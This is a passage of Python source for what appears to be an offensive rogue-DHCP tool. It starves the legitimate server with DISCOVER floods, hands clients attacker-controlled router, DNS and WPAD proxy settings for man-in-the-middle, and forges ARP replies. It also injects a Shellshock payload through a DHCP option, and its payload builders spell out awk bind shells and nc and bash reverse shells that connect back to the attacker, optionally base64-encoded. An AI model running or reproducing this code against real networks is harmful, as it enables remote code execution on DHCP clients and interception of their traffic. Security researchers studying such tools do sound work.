parser.add_argument('--dhcp_mac', type=str, help='Set DHCP server MAC address, if not set use your MAC address', default=None)
parser.add_argument('--dhcp_ip', type=str, help='Set DHCP server IP address, if not set use your IP address', default=None)
parser.add_argument('--router', type=str, help='Set router IP address, if not set use your ip address', default=None)
parser.add_argument('--dns', type=str, help='Set DNS server IP address, if not set use your ip address', default=None)
parser.add_argument('--tftp', type=str, help='Set TFTP server IP address', default=None)
parser.add_argument('--wins', type=str, help='Set WINS server IP address', default=None)
parser.add_argument('--proxy', type=str, help='Set Proxy URL, example: 192.168.0.1:8080', default=None)
parser.add_argument('--domain', type=str, help='Set domain name for search, default=local', default="local")
parser.add_argument('--lease_time', type=int, help='Set lease time, default=172800', default=172800)
parser.add_argument('-s', '--send_discover', action='store_true',
help='Send DHCP discover packets in the background thread')
parser.add_argument('-r', '--discover_rand_mac', action='store_true',
help='Use random MAC address for source MAC address in DHCP discover packets')
parser.add_argument('-d', '--discover_delay', type=float,
help='Set delay between DHCP discover packets (default=0.5 sec.)', default=0.5)
parser.add_argument('-O', '--shellshock_option_code', type=int,
                    help='Set DHCP option code for injecting the shellshock payload, default=114', default=114)
parser.add_argument('-c', '--shellshock_command', type=str, help='Set shellshock command in DHCP client')
parser.add_argument('-b', '--bind_shell', action='store_true', help='Use awk bind tcp shell in DHCP client')
parser.add_argument('-p', '--bind_port', type=int, help='Set port for bind shell listener (default=1234)', default=1234)
parser.add_argument('-N', '--nc_reverse_shell', action='store_true', help='Use nc reverse tcp shell in DHCP client')
parser.add_argument('-E', '--nce_reverse_shell', action='store_true', help='Use nc -e reverse tcp shell in DHCP client')
parser.add_argument('-R', '--bash_reverse_shell', action='store_true', help='Use bash reverse tcp shell in DHCP client')
parser.add_argument('-e', '--reverse_port', type=int, help='Set port for reverse shell listener (default=443)', default=443)
parser.add_argument('-n', '--without_network', action='store_true', help='Do not add network configure in payload')
parser.add_argument('-B', '--without_base64', action='store_true', help='Do not use base64 encode in payload')
parser.add_argument('--ip_path', type=str,
help='Set path to "ip" in shellshock payload, default = /bin/', default="/bin/")
parser.add_argument('--iface_name', type=str,
help='Set iface name in shellshock payload, default = eth0', default="eth0")
parser.add_argument('--broadcast_response', action='store_true', help='Send broadcast response')
parser.add_argument('--dnsop', action='store_true', help='Do not send DHCP OFFER packets')
parser.add_argument('--exit', action='store_true', help='Exit on success MiTM attack')
parser.add_argument('-q', '--quiet', action='store_true', help='Minimal output')
args = parser.parse_args()
# endregion
# region Print banner if argument quit is not set
if not args.quiet:
Base.print_banner()
# endregion
# region Set global variables
eth = Ethernet_raw()
arp = ARP_raw()
ip = IP_raw()
udp = UDP_raw()
dhcp = DHCP_raw()
first_offer_ip_address = None
last_offer_ip_address = None
network_mask = None
target_mac_address = None
target_ip_address = None
dhcp_server_mac_address = None
dhcp_server_ip_address = None
router_ip_address = None
dns_server_ip_address = None
tftp_server_ip_address = None
wins_server_ip_address = None
wpad_url = None
dhcp_discover_packets_source_mac = None
free_ip_addresses = []
clients = {}
shellshock_url = None
domain = None
payload = None
SOCK = None
discover_sender_is_work = False
# endregion
# region Get your network settings
if args.interface is None:
Base.print_warning("Please set a network interface for sniffing ARP and DHCP requests ...")
current_network_interface = Base.netiface_selection(args.interface)
your_mac_address = Base.get_netiface_mac_address(current_network_interface)
if your_mac_address is None:
Base.print_error("Network interface: ", current_network_interface, " do not have MAC address!")
exit(1)
your_ip_address = Base.get_netiface_ip_address(current_network_interface)
if your_ip_address is None:
Base.print_error("Network interface: ", current_network_interface, " do not have IP address!")
exit(1)
your_network_mask = Base.get_netiface_netmask(current_network_interface)
if your_network_mask is None:
Base.print_error("Network interface: ", current_network_interface, " do not have network mask!")
exit(1)
if args.netmask is None:
network_mask = your_network_mask
else:
network_mask = args.netmask
# endregion
# region Create raw socket
SOCK = socket(AF_PACKET, SOCK_RAW)
SOCK.bind((current_network_interface, 0))
# endregion
# region Get first and last IP address in your network
first_ip_address = str(IPv4Address(unicode(Base.get_netiface_first_ip(current_network_interface))) - 1)
last_ip_address = str(IPv4Address(unicode(Base.get_netiface_last_ip(current_network_interface))) + 1)
# endregion
# region Set target MAC and IP address, if target IP is not set - get first and last offer IP
if args.target_mac is not None:
target_mac_address = str(args.target_mac).lower()
# region Target IP is set
if args.target_ip is not None:
if args.target_mac is not None:
if not Base.ip_address_in_range(args.target_ip, first_ip_address, last_ip_address):
Base.print_error("Bad value `-I, --target_ip`: ", args.target_ip,
"; target IP address must be in range: ", first_ip_address + " - " + last_ip_address)
exit(1)
else:
target_ip_address = args.target_ip
else:
Base.print_error("Please set target MAC address (example: --target_mac 00:AA:BB:CC:DD:FF)" +
", for target IP address: ", args.target_ip)
exit(1)
# Set default first offer IP and last offer IP
first_offer_ip_address = str(IPv4Address(unicode(first_ip_address)) + 1)
last_offer_ip_address = str(IPv4Address(unicode(last_ip_address)) - 1)
# endregion
# region Target IP is not set - get first and last offer IP
else:
# Check first offer IP address
if args.first_offer_ip is None:
first_offer_ip_address = str(IPv4Address(unicode(first_ip_address)) + 1)
else:
if not Base.ip_address_in_range(args.first_offer_ip, first_ip_address, last_ip_address):
Base.print_error("Bad value `-f, --first_offer_ip`: ", args.first_offer_ip,
"; first IP address in your network: ", first_ip_address)
exit(1)
else:
first_offer_ip_address = args.first_offer_ip
# Check last offer IP address
if args.last_offer_ip is None:
last_offer_ip_address = str(IPv4Address(unicode(last_ip_address)) - 1)
else:
if not Base.ip_address_in_range(args.last_offer_ip, first_ip_address, last_ip_address):
Base.print_error("Bad value `-l, --last_offer_ip`: ", args.last_offer_ip,
"; last IP address in your network: ", last_ip_address)
exit(1)
else:
last_offer_ip_address = args.last_offer_ip
# endregion
# endregion
# region Set DHCP sever MAC and IP address
if args.dhcp_mac is None:
dhcp_server_mac_address = your_mac_address
else:
dhcp_server_mac_address = args.dhcp_mac
if args.dhcp_ip is None:
dhcp_server_ip_address = your_ip_address
else:
if not Base.ip_address_in_range(args.dhcp_ip, first_ip_address, last_ip_address):
Base.print_error("Bad value `--dhcp_ip`: ", args.dhcp_ip,
"; DHCP server IP address must be in range: ", first_ip_address + " - " + last_ip_address)
exit(1)
else:
dhcp_server_ip_address = args.dhcp_ip
# endregion
# region Set router, dns, tftp, wins IP address
# Set router IP address
if args.router is None:
router_ip_address = your_ip_address
else:
if not Base.ip_address_in_range(args.router, first_ip_address, last_ip_address):
Base.print_error("Bad value `--router`: ", args.router,
"; Router IP address must be in range: ", first_ip_address + " - " + last_ip_address)
exit(1)
else:
router_ip_address = args.router
# Set DNS server IP address
if args.dns is None:
dns_server_ip_address = your_ip_address
else:
if not Base.ip_address_validation(args.dns):
Base.print_error("Bad DNS server IP address in `--dns` parameter: ", args.dns)
exit(1)
else:
dns_server_ip_address = args.dns
# Set TFTP server IP address
if args.tftp is None:
tftp_server_ip_address = your_ip_address
else:
if not Base.ip_address_in_range(args.tftp, first_ip_address, last_ip_address):
Base.print_error("Bad value `--tftp`: ", args.tftp,
"; TFTP server IP address must be in range: ", first_ip_address + " - " + last_ip_address)
exit(1)
else:
tftp_server_ip_address = args.tftp
# Set WINS server IP address
if args.wins is None:
wins_server_ip_address = your_ip_address
else:
if not Base.ip_address_in_range(args.wins, first_ip_address, last_ip_address):
Base.print_error("Bad value `--wins`: ", args.tftp,
"; WINS server IP address must be in range: ", first_ip_address + " - " + last_ip_address)
exit(1)
else:
wins_server_ip_address = args.wins
# endregion
# region Set proxy
if args.proxy is not None:
# Set variables
wpad_url = "http://" + your_ip_address + "/wpad.dat"
apache2_sites_available_dir = "/etc/apache2/sites-available/"
apache2_sites_path = "/var/www/html/"
wpad_path = apache2_sites_path + "wpad/"
# Apache2 sites settings
default_site_file_name = "000-default.conf"
default_site_file = open(apache2_sites_available_dir + default_site_file_name, 'w')
default_site_file.write("<VirtualHost *:80>\n" +
"\tServerAdmin [email protected]\n" +
"\tDocumentRoot " + wpad_path + "\n" +
"\t<Directory " + wpad_path + ">\n" +
"\t\tOptions FollowSymLinks\n" +
"\t\tAllowOverride None\n" +
"\t\tOrder allow,deny\n" +
"\t\tAllow from all\n" +
"\t</Directory>\n" +
"</VirtualHost>\n")
default_site_file.close()
# Create dir with wpad.dat script
try:
makedirs(wpad_path)
except OSError:
Base.print_info("Path: ", wpad_path, " already exist")
except:
Base.print_error("Something else went wrong while trying to create path: ", wpad_path)
exit(1)
# Copy wpad.dat script
wpad_script_name = "wpad.dat"
wpad_script_src = utils_path + wpad_script_name
wpad_script_dst = wpad_path + wpad_script_name
copyfile(src=wpad_script_src, dst=wpad_script_dst)
# Read redirect script
with open(wpad_script_dst, 'r') as redirect_script:
content = redirect_script.read()
# Replace the Proxy URL
content = content.replace('proxy_url', args.proxy)
# Write redirect script
with open(wpad_script_dst, 'w') as redirect_script:
redirect_script.write(content)
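    # Editorial note: the copied wpad.dat is assumed to be a standard proxy
    # auto-configuration (PAC) script whose 'proxy_url' placeholder is substituted
    # above; a minimal PAC file of that shape (illustrative only, not the actual
    # bundled file) would be:
    # function FindProxyForURL(url, host) { return "PROXY 192.168.0.1:8080"; }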
# Restart Apache2 server
try:
Base.print_info("Restarting apache2 server ...")
sub.Popen(['service apache2 restart >/dev/null 2>&1'], shell=True)
except OSError as e:
if e.errno == errno.ENOENT:
Base.print_error("Program: ", "service", " is not installed!")
exit(1)
else:
Base.print_error("Something went wrong while trying to run ", "`service apache2 restart`")
exit(2)
# Check apache2 is running
sleep(2)
apache2_pid = Base.get_process_pid("apache2")
if apache2_pid == -1:
Base.print_error("Apache2 server is not running!")
exit(1)
else:
Base.print_info("Apache2 server is running, PID: ", str(apache2_pid))
# endregion
# region Set Shellshock option code
if not 0 < args.shellshock_option_code < 255:
Base.print_error("Bad value: ", args.shellshock_option_code,
"in DHCP option code! This value should be in the range from 1 to 254")
exit(1)
# endregion
# region Set search domain
domain = bytes(args.domain)
# endregion
# region General output
if not args.quiet:
Base.print_info("Network interface: ", current_network_interface)
Base.print_info("Your IP address: ", your_ip_address)
Base.print_info("Your MAC address: ", your_mac_address)
if target_mac_address is not None:
Base.print_info("Target MAC: ", target_mac_address)
# If target IP address is set print target IP, else print first and last offer IP
if target_ip_address is not None:
Base.print_info("Target IP: ", target_ip_address)
else:
Base.print_info("First offer IP: ", first_offer_ip_address)
Base.print_info("Last offer IP: ", last_offer_ip_address)
Base.print_info("DHCP server mac address: ", dhcp_server_mac_address)
Base.print_info("DHCP server ip address: ", dhcp_server_ip_address)
Base.print_info("Router IP address: ", router_ip_address)
Base.print_info("DNS server IP address: ", dns_server_ip_address)
Base.print_info("TFTP server IP address: ", tftp_server_ip_address)
if args.proxy is not None:
Base.print_info("Proxy url: ", args.proxy)
# endregion
# region Get free IP addresses in local network
def get_free_ip_addresses():
global Scanner
# Get all IP addresses in range from first to last offer IP address
current_ip_address = first_offer_ip_address
while IPv4Address(unicode(current_ip_address)) <= IPv4Address(unicode(last_offer_ip_address)):
free_ip_addresses.append(current_ip_address)
current_ip_address = str(IPv4Address(unicode(current_ip_address)) + 1)
Base.print_info("ARP scan on interface: ", current_network_interface, " is running ...")
localnet_ip_addresses = Scanner.find_ip_in_local_network(current_network_interface)
for ip_address in localnet_ip_addresses:
try:
free_ip_addresses.remove(ip_address)
except ValueError:
pass
# endregion
# region Add client info in global clients dictionary
def add_client_info_in_dictionary(client_mac_address, client_info, this_client_already_in_dictionary=False):
if this_client_already_in_dictionary:
clients[client_mac_address].update(client_info)
else:
clients[client_mac_address] = client_info
# endregion
# region Make DHCP offer packet
def make_dhcp_offer_packet(transaction_id, offer_ip, client_mac, destination_mac=None, destination_ip=None):
if destination_mac is None:
destination_mac = "ff:ff:ff:ff:ff:ff"
if destination_ip is None:
destination_ip = "255.255.255.255"
return dhcp.make_response_packet(source_mac=dhcp_server_mac_address,
destination_mac=destination_mac,
source_ip=dhcp_server_ip_address,
destination_ip=destination_ip,
transaction_id=transaction_id,
your_ip=offer_ip,
client_mac=client_mac,
dhcp_server_id=dhcp_server_ip_address,
lease_time=args.lease_time,
netmask=network_mask,
router=router_ip_address,
dns=dns_server_ip_address,
dhcp_operation=2,
payload=None)
# endregion
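# Editorial note (assumption about the DHCP_raw helper, not stated in this script):
# the dhcp_operation values passed to make_response_packet appear to follow the
# RFC 2132 option 53 message-type codes, so 2 above builds a DHCPOFFER and 5 in the
# ACK builder below builds a DHCPACK, while make_nak_packet corresponds to type 6.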
# region Make DHCP ack packet
def make_dhcp_ack_packet(transaction_id, target_mac, target_ip, destination_mac=None, destination_ip=None):
if destination_mac is None:
destination_mac = "ff:ff:ff:ff:ff:ff"
if destination_ip is None:
destination_ip = "255.255.255.255"
return dhcp.make_response_packet(source_mac=dhcp_server_mac_address,
destination_mac=destination_mac,
source_ip=dhcp_server_ip_address,
destination_ip=destination_ip,
transaction_id=transaction_id,
your_ip=target_ip,
client_mac=target_mac,
dhcp_server_id=dhcp_server_ip_address,
lease_time=args.lease_time,
netmask=network_mask,
router=router_ip_address,
dns=dns_server_ip_address,
dhcp_operation=5,
payload=shellshock_url,
proxy=bytes(wpad_url),
domain=domain,
tftp=tftp_server_ip_address,
wins=wins_server_ip_address,
payload_option_code=args.shellshock_option_code)
# endregion
# region Make DHCP nak packet
def make_dhcp_nak_packet(transaction_id, target_mac, target_ip, requested_ip):
return dhcp.make_nak_packet(source_mac=dhcp_server_mac_address,
destination_mac=target_mac,
source_ip=dhcp_server_ip_address,
destination_ip=requested_ip,
transaction_id=transaction_id,
your_ip=target_ip,
client_mac=target_mac,
dhcp_server_id=dhcp_server_ip_address)
# endregion
# def ack_sender():
# SOCK = socket(AF_PACKET, SOCK_RAW)
# SOCK.bind((current_network_interface, 0))
# ack_packet = make_dhcp_ack_packet(transaction_id_global, requested_ip_address)
# while True:
# SOCK.send(ack_packet)
# sleep(0.01)
# region Send DHCP discover packets
def discover_sender(number_of_packets=999999):
global discover_sender_is_work
discover_sender_is_work = True
packet_index = 0
SOCK = socket(AF_PACKET, SOCK_RAW)
SOCK.bind((current_network_interface, 0))
if dhcp_discover_packets_source_mac != your_mac_address:
relay_agent_ip_address = Base.get_netiface_random_ip(current_network_interface)
while packet_index < number_of_packets:
try:
discover_packet = dhcp.make_discover_packet(source_mac=dhcp_discover_packets_source_mac,
client_mac=eth.get_random_mac(),
host_name=Base.make_random_string(8),
relay_ip=relay_agent_ip_address)
SOCK.send(discover_packet)
sleep(args.discover_delay)
except:
Base.print_error("Something went wrong when sending DHCP discover packets!")
packet_index += 1
else:
while packet_index < number_of_packets:
try:
discover_packet = dhcp.make_discover_packet(source_mac=dhcp_discover_packets_source_mac,
client_mac=eth.get_random_mac(),
host_name=Base.make_random_string(8),
relay_ip=your_ip_address)
SOCK.send(discover_packet)
sleep(args.discover_delay)
except:
Base.print_error("Something went wrong when sending DHCP discover packets!")
packet_index += 1
SOCK.close()
discover_sender_is_work = False
# endregion
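# Editorial note: flooding DISCOVERs from random client MAC addresses, as
# discover_sender does above, is a DHCP starvation technique: it appears intended to
# exhaust the legitimate server's address pool so that clients are more likely to
# accept this rogue server's offers.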
# region Reply to DHCP and ARP requests
def reply(request):
# region Define global variables
global SOCK
global clients
global target_ip_address
global router_ip_address
global payload
global shellshock_url
global args
global discover_sender_is_work
# endregion
# region DHCP
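    # Editorial note: request['DHCP'][53] below carries the DHCP message-type option
    # (RFC 2132); the branches handle 1 (DISCOVER), 7 (RELEASE), 8 (INFORM) and
    # 3 (REQUEST), and option 50 is the client's requested IP address.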
if 'DHCP' in request.keys():
# region Get transaction id and client MAC address
transaction_id = request['BOOTP']['transaction-id']
client_mac_address = request['BOOTP']['client-mac-address']
# endregion
# region Check this client already in dict
client_already_in_dictionary = False
if client_mac_address in clients.keys():
client_already_in_dictionary = True
# endregion
# region DHCP DISCOVER
if request['DHCP'][53] == 1:
# region Print INFO message
Base.print_info("DHCP DISCOVER from: ", client_mac_address, " transaction id: ", hex(transaction_id))
# endregion
# If parameter "Do not send DHCP OFFER packets" is not set
if not args.dnsop:
# region Start DHCP discover sender
if args.send_discover:
if not discover_sender_is_work:
discover_sender(100)
# endregion
# If target IP address is set - offer IP = target IP
if target_ip_address is not None:
offer_ip_address = target_ip_address
# If target IP address is not set - offer IP = random IP from free IP addresses list
else:
                    random_index = randint(0, len(free_ip_addresses) - 1)
offer_ip_address = free_ip_addresses[random_index]
# Delete offer IP from free IP addresses list
del free_ip_addresses[random_index]
if args.broadcast_response:
offer_packet = make_dhcp_offer_packet(transaction_id, offer_ip_address, client_mac_address)
else:
offer_packet = make_dhcp_offer_packet(transaction_id, offer_ip_address, client_mac_address,
client_mac_address, offer_ip_address)
SOCK.send(offer_packet)
# Add client info in global clients dictionary
add_client_info_in_dictionary(client_mac_address,
{"transaction": transaction_id, "discover": True,
"offer_ip": offer_ip_address},
client_already_in_dictionary)
# Print INFO message
Base.print_info("DHCP OFFER to: ", client_mac_address, " offer IP: ", offer_ip_address)
# endregion
# region DHCP RELEASE
if request['DHCP'][53] == 7:
if request['BOOTP']['client-ip-address'] is not None:
client_ip = request['BOOTP']['client-ip-address']
Base.print_info("DHCP RELEASE from: ", client_ip + " (" + client_mac_address + ")",
" transaction id: ", hex(transaction_id))
# Add client info in global clients dictionary
add_client_info_in_dictionary(client_mac_address,
{"client_ip": client_ip},
client_already_in_dictionary)
# print clients
# Add release client IP in free IP addresses list
if client_ip not in free_ip_addresses:
free_ip_addresses.append(client_ip)
else:
Base.print_info("DHCP RELEASE from: ", client_mac_address, " transaction id: ", hex(transaction_id))
# Add client info in global clients dictionary
add_client_info_in_dictionary(client_mac_address,
{"release": True},
client_already_in_dictionary)
# print clients
# endregion
# region DHCP INFORM
if request['DHCP'][53] == 8:
if request['BOOTP']['client-ip-address'] is not None:
client_ip = request['BOOTP']['client-ip-address']
Base.print_info("DHCP INFORM from: ", client_ip + " (" + client_mac_address + ")",
" transaction id: ", hex(transaction_id))
# If client IP in free IP addresses list delete this
if client_ip in free_ip_addresses:
free_ip_addresses.remove(client_ip)
# Add client info in global clients dictionary
add_client_info_in_dictionary(client_mac_address,
{"client_ip": client_ip},
client_already_in_dictionary)
# print clients
else:
Base.print_info("DHCP INFORM from: ", client_mac_address, " transaction id: ", hex(transaction_id))
# Add client info in global clients dictionary
add_client_info_in_dictionary(client_mac_address,
{"inform": True},
client_already_in_dictionary)
# print clients
# endregion
# region DHCP REQUEST
if request['DHCP'][53] == 3:
# region Set local variables
requested_ip = "0.0.0.0"
offer_ip = None
# endregion
# region Get requested IP
if 50 in request['DHCP'].keys():
requested_ip = str(request['DHCP'][50])
# endregion
# region Print info message
Base.print_info("DHCP REQUEST from: ", client_mac_address, " transaction id: ", hex(transaction_id),
" requested ip: ", requested_ip)
# endregion
# region Requested IP not in range from first offer IP to last offer IP
if not Base.ip_address_in_range(requested_ip, first_offer_ip_address, last_offer_ip_address):
Base.print_warning("Client: ", client_mac_address, " requested IP: ", requested_ip,
" not in range: ", first_offer_ip_address + " - " + last_offer_ip_address)
# endregion
# region Requested IP in range from first offer IP to last offer IP
else:
# region Start DHCP discover sender
if args.send_discover:
if not discover_sender_is_work:
discover_sender(100)
# endregion
# region Change client info in global clients dictionary
# Add client info in global clients dictionary
add_client_info_in_dictionary(client_mac_address,
{"request": True, "requested_ip": requested_ip,
"transaction": transaction_id},
client_already_in_dictionary)
# Delete ARP mitm success keys in dictionary for this client
clients[client_mac_address].pop('client request his ip', None)
clients[client_mac_address].pop('client request router ip', None)
clients[client_mac_address].pop('client request dns ip', None)
# endregion
# region Get offer IP address
try:
offer_ip = clients[client_mac_address]["offer_ip"]
except KeyError:
pass
# endregion
# region This client already send DHCP DISCOVER and offer IP != requested IP
if offer_ip is not None and offer_ip != requested_ip:
# Print error message
Base.print_error("Client: ", client_mac_address, " requested IP: ", requested_ip,
" not like offer IP: ", offer_ip)
# Create and send DHCP nak packet
nak_packet = make_dhcp_nak_packet(transaction_id, client_mac_address, offer_ip, requested_ip)
SOCK.send(nak_packet)
Base.print_info("DHCP NAK to: ", client_mac_address, " requested ip: ", requested_ip)
# Add client info in global clients dictionary
add_client_info_in_dictionary(client_mac_address,
{"mitm": "error: offer ip not like requested ip", "offer_ip": None},
client_already_in_dictionary)
# print clients
# endregion
# region Offer IP == requested IP or this is a first request from this client
else:
# region Target IP address is set and requested IP != target IP
if target_ip_address is not None and requested_ip != target_ip_address:
# Print error message
Base.print_error("Client: ", client_mac_address, " requested IP: ", requested_ip,
" not like target IP: ", target_ip_address)
# Create and send DHCP nak packet
nak_packet = make_dhcp_nak_packet(transaction_id, client_mac_address,
target_ip_address, requested_ip)
SOCK.send(nak_packet)
Base.print_info("DHCP NAK to: ", client_mac_address, " requested ip: ", requested_ip)
# Add client info in global clients dictionary
add_client_info_in_dictionary(client_mac_address,
{"mitm": "error: target ip not like requested ip", "offer_ip": None,
"nak": True},
client_already_in_dictionary)
# endregion
# region Target IP address is set and requested IP == target IP or Target IP is not set
else:
# region Settings shellshock payload
# region Create payload
# Network settings command in target machine
net_settings = args.ip_path + "ip addr add " + requested_ip + "/" + \
str(IPAddress(network_mask).netmask_bits()) + " dev " + args.iface_name + ";"
# Shellshock payload: <user bash command>
if args.shellshock_command is not None:
payload = args.shellshock_command
# Shellshock payload:
# awk 'BEGIN{s="/inet/tcp/<bind_port>/0/0";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)}' &
if args.bind_shell:
payload = "awk 'BEGIN{s=\"/inet/tcp/" + str(args.bind_port) + \
"/0/0\";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)}' &"
# Shellshock payload:
# rm /tmp/f 2>/dev/null;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <your_ip> <your_port> >/tmp/f &
if args.nc_reverse_shell:
payload = "rm /tmp/f 2>/dev/null;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc " + \
your_ip_address + " " + str(args.reverse_port) + " >/tmp/f &"
# Shellshock payload:
# /bin/nc -e /bin/sh <your_ip> <your_port> 2>&1 &
if args.nce_reverse_shell:
payload = "/bin/nc -e /bin/sh " + your_ip_address + " " + str(args.reverse_port) + " 2>&1 &"
# Shellshock payload:
# /bin/bash -i >& /dev/tcp/<your_ip>/<your_port> 0>&1 &
if args.bash_reverse_shell:
payload = "/bin/bash -i >& /dev/tcp/" + your_ip_address + \
"/" + str(args.reverse_port) + " 0>&1 &"
if payload is not None:
# Do not add network settings command in payload
if not args.without_network:
payload = net_settings + payload
# Send payload to target in clear text
if args.without_base64:
shellshock_url = "() { :; }; " + payload
# Send base64 encoded payload to target in clear text
else:
payload = b64encode(payload)
shellshock_url = "() { :; }; /bin/sh <(/usr/bin/base64 -d <<< " + payload + ")"
# endregion
# region Check Shellshock payload length
if shellshock_url is not None:
if len(shellshock_url) > 255:
Base.print_error("Length of shellshock payload is very big! Current length: ",
                                                 str(len(shellshock_url)), " Maximum length: ", "255")
shellshock_url = "A"
# endregion
# endregion
# region Send DHCP ack and print info message
if args.broadcast_response:
ack_packet = make_dhcp_ack_packet(transaction_id, client_mac_address, requested_ip)
else:
ack_packet = make_dhcp_ack_packet(transaction_id, client_mac_address, requested_ip,
client_mac_address, requested_ip)
Base.print_info("DHCP ACK to: ", client_mac_address, " requested ip: ", requested_ip)
SOCK.send(ack_packet)
# endregion
# region Add client info in global clients dictionary
try:
clients[client_mac_address].update({"mitm": "success"})
except KeyError:
clients[client_mac_address] = {"mitm": "success"}
# endregion
# endregion
# endregion
# endregion
# endregion
# region DHCP DECLINE
if request['DHCP'][53] == 4:
# Get requested IP
requested_ip = "0.0.0.0"
if 50 in request['DHCP'].keys():
requested_ip = str(request['DHCP'][50])
# Print info message
Base.print_info("DHCP DECLINE from: ", requested_ip + " (" + client_mac_address + ")",
" transaction id: ", hex(transaction_id))
# If client IP in free IP addresses list delete this
if requested_ip in free_ip_addresses:
free_ip_addresses.remove(requested_ip)
# Add client info in global clients dictionary
add_client_info_in_dictionary(client_mac_address,
{"decline_ip": requested_ip, "decline": True},
client_already_in_dictionary)
# print clients
# endregion
# endregion DHCP
# region ARP
if 'ARP' in request.keys():
if request['Ethernet']['destination'] == "ff:ff:ff:ff:ff:ff" and \
request['ARP']['target-mac'] == "00:00:00:00:00:00":
# region Set local variables
arp_sender_mac_address = request['ARP']['sender-mac']
arp_sender_ip_address = request['ARP']['sender-ip']
arp_target_ip_address = request['ARP']['target-ip']
# endregion
# region Print info message
Base.print_info("ARP request from: ", arp_sender_mac_address,
" \"", "Who has " + arp_target_ip_address + "? Tell " + arp_sender_ip_address, "\"")
# endregion
# region Get client mitm status
try:
mitm_status = clients[arp_sender_mac_address]["mitm"]
except KeyError:
mitm_status = ""
# endregion
# region Get client requested ip
try:
requested_ip = clients[arp_sender_mac_address]["requested_ip"]
except KeyError:
requested_ip = ""
# endregion
# region Create IPv4 address conflict
if mitm_status.startswith("error"):
arp_reply = arp.make_response(ethernet_src_mac=your_mac_address,
ethernet_dst_mac=arp_sender_mac_address,
sender_mac=your_mac_address, sender_ip=arp_target_ip_address,
target_mac=arp_sender_mac_address, target_ip=arp_sender_ip_address)
SOCK.send(arp_reply)
Base.print_info("ARP response to: ", arp_sender_mac_address,
" \"", arp_target_ip_address + " is at " + your_mac_address,
"\" (IPv4 address conflict)")
# endregion
# region MITM success
if mitm_status.startswith("success"):
if arp_target_ip_address == requested_ip:
clients[arp_sender_mac_address].update({"client request his ip": True})
if arp_target_ip_address == router_ip_address:
clients[arp_sender_mac_address].update({"client request router ip": True})
if arp_target_ip_address == dns_server_ip_address:
clients[arp_sender_mac_address].update({"client request dns ip": True})
try:
test = clients[arp_sender_mac_address]["client request his ip"]
test = clients[arp_sender_mac_address]["client request router ip"]
test = clients[arp_sender_mac_address]["client request dns ip"]
try:
test = clients[arp_sender_mac_address]["success message"]
except KeyError:
if args.exit:
sleep(3)
Base.print_success("MITM success: ", requested_ip + " (" + arp_sender_mac_address + ")")
exit(0)
else:
Base.print_success("MITM success: ", requested_ip + " (" + arp_sender_mac_address + ")")
clients[arp_sender_mac_address].update({"success message": True})
except KeyError:
pass
# endregion
# endregion
# endregion
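# region Example: shape of a parsed request (illustrative sketch, not part of the original tool)
# An assumed example of the parsed request dictionary that reply() receives for a DHCP DISCOVER,
# using the same keys the handlers above read; the MAC address and transaction id are made up.
EXAMPLE_PARSED_DHCP_DISCOVER = {
    'Ethernet': {'source': '01:23:45:67:89:ab', 'destination': 'ff:ff:ff:ff:ff:ff'},
    'BOOTP': {'transaction-id': 0x12345678, 'client-mac-address': '01:23:45:67:89:ab',
              'client-ip-address': None},
    'DHCP': {53: 1},
}
# endregion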
# region Main function
if __name__ == "__main__":
# region Add ip addresses in list with free ip addresses from first to last offer IP
if target_ip_address is None:
Base.print_info("Create list with free IP addresses in your network ...")
get_free_ip_addresses()
# endregion
# region Send DHCP discover packets in the background thread
if args.send_discover:
Base.print_info("Start DHCP discover packets send in the background thread ...")
if args.discover_rand_mac:
dhcp_discover_packets_source_mac = eth.get_random_mac()
Base.print_info("DHCP discover packets Ethernet source MAC: ", dhcp_discover_packets_source_mac,
" (random MAC address)")
else:
dhcp_discover_packets_source_mac = your_mac_address
Base.print_info("DHCP discover packets Ethernet source MAC: ", dhcp_discover_packets_source_mac,
" (your MAC address)")
Base.print_info("Delay between DHCP discover packets: ", str(args.discover_delay))
tm.add_task(discover_sender)
# endregion
# region Sniff network
# region Create RAW socket for sniffing
raw_socket = socket(AF_PACKET, SOCK_RAW, htons(0x0003))
# endregion
# region Print info message
Base.print_info("Waiting for a ARP or DHCP requests ...")
# endregion
# region Start sniffing
while True:
# region Try
try:
# region Sniff packets from RAW socket
packets = raw_socket.recvfrom(2048)
for packet in packets:
# region Parse Ethernet header
ethernet_header = packet[0:eth.header_length]
ethernet_header_dict = eth.parse_header(ethernet_header)
# endregion
# region Could not parse Ethernet header - break
if ethernet_header_dict is None:
break
# endregion
# region Ethernet filter
if target_mac_address is not None:
if ethernet_header_dict['source'] != target_mac_address:
break
else:
if ethernet_header_dict['source'] == your_mac_address:
break
if dhcp_discover_packets_source_mac is not None:
if ethernet_header_dict['source'] == dhcp_discover_packets_source_mac:
break
# endregion
# region ARP packet
# 2054 - Type of ARP packet (0x0806)
if ethernet_header_dict['type'] == arp.packet_type:
# region Parse ARP packet
arp_header = packet[eth.header_length:eth.header_length + arp.packet_length]
arp_packet_dict = arp.parse_packet(arp_header)
# endregion
# region Could not parse ARP packet - break
if arp_packet_dict is None:
break
# endregion
# region ARP filter
if arp_packet_dict['opcode'] != 1:
break
# endregion
# region Call function with full ARP packet
reply({
'Ethernet': ethernet_header_dict,
'ARP': arp_packet_dict
})
# endregion
# endregion
# region IP packet
# 2048 - Type of IP packet (0x0800)
if ethernet_header_dict['type'] == ip.header_type:
# region Parse IP header
ip_header = packet[eth.header_length:]
ip_header_dict = ip.parse_header(ip_header)
# endregion
# region Could not parse IP header - break
if ip_header_dict is None:
break
# endregion
# region UDP
if ip_header_dict['protocol'] == udp.header_type:
# region Parse UDP header
udp_header_offset = eth.header_length + (ip_header_dict['length'] * 4)
udp_header = packet[udp_header_offset:udp_header_offset + udp.header_length]
udp_header_dict = udp.parse_header(udp_header)
# endregion
# region Could not parse UDP header - break
if udp_header is None:
break
# endregion
# region DHCP packet
if udp_header_dict['destination-port'] == 67 and udp_header_dict['source-port'] == 68:
# region Parse DHCP packet
dhcp_packet_offset = udp_header_offset + udp.header_length
dhcp_packet = packet[dhcp_packet_offset:]
dhcp_packet_dict = dhcp.parse_packet(dhcp_packet)
# endregion
# region Could not parse DHCP packet - break
if dhcp_packet_dict is None:
break
# endregion
# region Call function with full DHCP packet
full_dhcp_packet = {
'Ethernet': ethernet_header_dict,
'IP': ip_header_dict,
'UDP': udp_header_dict
}
